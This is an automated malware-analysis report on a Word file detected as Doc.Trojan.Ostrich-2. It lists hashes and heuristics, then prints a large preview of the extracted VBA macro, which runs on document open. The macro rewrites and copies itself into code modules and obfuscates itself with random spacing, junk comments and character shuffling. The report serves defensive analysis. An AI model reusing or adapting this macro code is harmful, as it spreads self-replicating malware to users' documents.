Doc.Trojan.Ostrich-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 74419b8dba372b31…

MALICIOUS

Office (OLE)

57.5 KB Created: 2000-09-06 09:13:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 24ff8f567a264a6b8e2cec49ee74d342 SHA-1: 05ffe1a72ef0f3d68be1013396fc429d662a059f SHA-256: 74419b8dba372b31489d6db241ca513ba1bad97bd60ca92180c9039807eede93
120 Risk Score

Malware Insights

Doc.Trojan.Ostrich-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Ostrich-2. Static analysis revealed a Document_Open VBA macro, indicating that malicious code executes automatically when the document is opened. The macro appears to be designed to download and execute a second-stage payload, as suggested by the embedded string '2/1/1', which may represent a URL or part of a command; note that in the extracted source this string appears only as a comment following an obfuscated constant, so this inference is tentative. The preview also shows the macro calling Randomize Timer and using .Find, .Lines and .InsertLines on a code-module object, which is consistent with the macro rewriting its own source (self-modifying behaviour) rather than, or in addition to, acting as a downloader.

Heuristics 3

  • ClamAV: Doc.Trojan.Ostrich-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ostrich-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19717 bytes
SHA-256: 9c1f2d738ae4cf14e0d379b275e322dcb360a9d0e56e5dc88bc1484ff372f424
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub R2TTrKt()
PJ3QG8bd:
Yhw72V:
        On Error GoTo XC5p92l7
    Const AV0HQ = "­¸¨©›‚¯÷€“𗌣•¦„¹¬ì¼šê¿®�ކˆõòŸÂèʲº°ÀçǘÄÿ¾í�Šï·½úëªÏ�â«Ãµ‹ ã‘ËÁ’ž¥ÍƒóåáŶ±¡Ó¢œÐ�ø»¤ù”³™´�ȇ৉ÑÌ" '"2/1/1"
     Dim Gu6uo As String
Dim AYn4L1 As Long
   Dim IJ8hG As Object
        Dim Upf5q As String

        
     GoTo ELJUH
      GoTo ST41MvM1
Ya06yr7:
    
IJ8hG.InsertLines AYn4L1, Gu6uo
Return

GoTo ST41MvM1
ELJUH:
     '2216,929  186,7117    3271,358    462,6598

  Dim BWaEg1D As Object
         Dim T28g8 As Object
   Dim XNXJ8erQ As Object
    '2452,214   2207,467    2519,228    705,977
      Dim Cf38Ok3 As Byte

        Dim DofuTU As String
 '4548,351  5528,961    5898,332    1464,439    1445,479    3645,693

         Dim Xl9RVi As String
    Dim Re6kR2S9 As Variant
 Dim Tp7acWqA As String
  Dim HhyeV As String
 Dim AqC76 As Long
   Dim D1CkC As Long
         Dim WmFYK As Long
  Dim Hq5BIA8R As Long
        Dim BoSJGF1X As Long
 Dim R8uPS1OJ As Long
        Dim N6c6iNCM As String
 Dim E11N9hva As String
        Dim L9r675h As String

Dim O87WP0rc As String
'1926,591   1687,314    1307,476    444,9875    344,6219    3552,119    2223,918    230,669
        Dim O46c25 As Variant
         
Dim AGwSy7 As Variant
     Dim IC6xFGe As Variant
       Dim W1U5N3s0 As String
  Dim DibMU As Variant

  GoSub UrLwd
        Randomize Timer

       GoTo FQ00m
       GoTo ST41MvM1
SYvG0Js:
     
With IJ8hG
        GoSub BW83u: N6c6iNCM = Xl9RVi
        For WmFYK = &O6 To UBound(DibMU)
AqC76 = &O0
         If .Find(DibMU(WmFYK), AqC76, &O1, .CountOfLines, 1, False, False, False) Then
  AYn4L1 = AqC76 + &O1: Gu6uo = N6c6iNCM: GoSub Ya06yr7

Else
'375,6292   5583,097
       AYn4L1 = .CountOfLines + &O1: Gu6uo = DibMU(&O4) & DibMU(WmFYK) & vbCr & N6c6iNCM & vbCr & DibMU(&O5): GoSub Ya06yr7
 End If
         '1452,931  1,372565    1211,926
         Next WmFYK
   '7999,172    3567,392    6805,117    292,9756    838,2194    932,2023
Upf5q = "þÍÊ": GoSub XgNA0aw: N6c6iNCM = Upf5q & Chr(&O40): AqC76 = &O0
  If .Find(N6c6iNCM, AqC76, &O1, .CountOfLines, 1, False, False, False) Then AYn4L1 = AqC76 Else AYn4L1 = &O1
         Gu6uo = DibMU(&O4) & N6c6iNCM & Xl9RVi & vbCr & Tp7acWqA & DibMU(&O5) & vbCr: GoSub Ya06yr7
 End With
       GoTo JIx98h99
         GoTo ST41MvM1
ME5J7l:
HhyeV = AV0HQ
For WmFYK = &O1 To Len(HhyeV)
     Hq5BIA8R = Int(Rnd * (Len(HhyeV) - &O1)) + &O1: N6c6iNCM = Mid(HhyeV, Hq5BIA8R, &O1)
     
Mid(HhyeV, Hq5BIA8R, &O1) = Mid(HhyeV, WmFYK, &O1): Mid(HhyeV, WmFYK, &O1) = N6c6iNCM
        Next WmFYK
       
GoTo WbGElD5
  GoTo ST41MvM1
WbGElD5:
       ReDim Re6kR2S9(&O26) As String
    '4142,649   3406,692    223,618 6631,804    67,30429    4020,235    639,2946    1137,197    61,79515
        With T28g8
         AqC76 = &O0: D1CkC = &O0
     .Find "PJ3QG8bd" & Chr(&O72), AqC76, &O0, &O0, &O0, True, True, False: If AqC76 = &O0 Then GoTo XC5p92l7
       .Find "ST41MvM1" & Chr(&O72), D1CkC, &O0, &O0, &O0, True, True, False: If D1CkC = &O0 Then GoTo XC5p92l7
  For WmFYK = AqC76 To D1CkC
  '2492,164 4761,531    1921,003    6,593213    248,7458    2498,195    64,08987    2358,521
   N6c6iNCM = Trim(.Lines(WmFYK, &O1))
 If N6c6iNCM <> "" And Left(N6c6iNCM, &O1) <> Chr(&O47) Then Tp7acWqA = Tp7acWqA & String(Int(Rnd * &O12), Chr(&O40)) & N6c6iNCM & vbCr
     If Int(Rnd * &O12) + &O1 = &O1 Then Tp7acWqA = Tp7acWqA & vbCr
     If Int(Rnd * &O11) + &O1 > &O10 Then
 N6c6iNCM = ""
         For Hq5BIA8R = &O0 To Int(Rnd * &O11) + &O1: N6c6iNCM = N6c6iNCM & Rnd * (Rnd * &O23420) & vbTab: Next Hq5BIA8R
    Tp7acWqA = Tp7acWqA & String(Int(Rnd * &O12), Chr(&O40)) & Chr(&O47) & N6c6iNCM & vbCr
      '1879,005 1309,242    9,723623    1567,592    595,3113    2280,098  
... (truncated)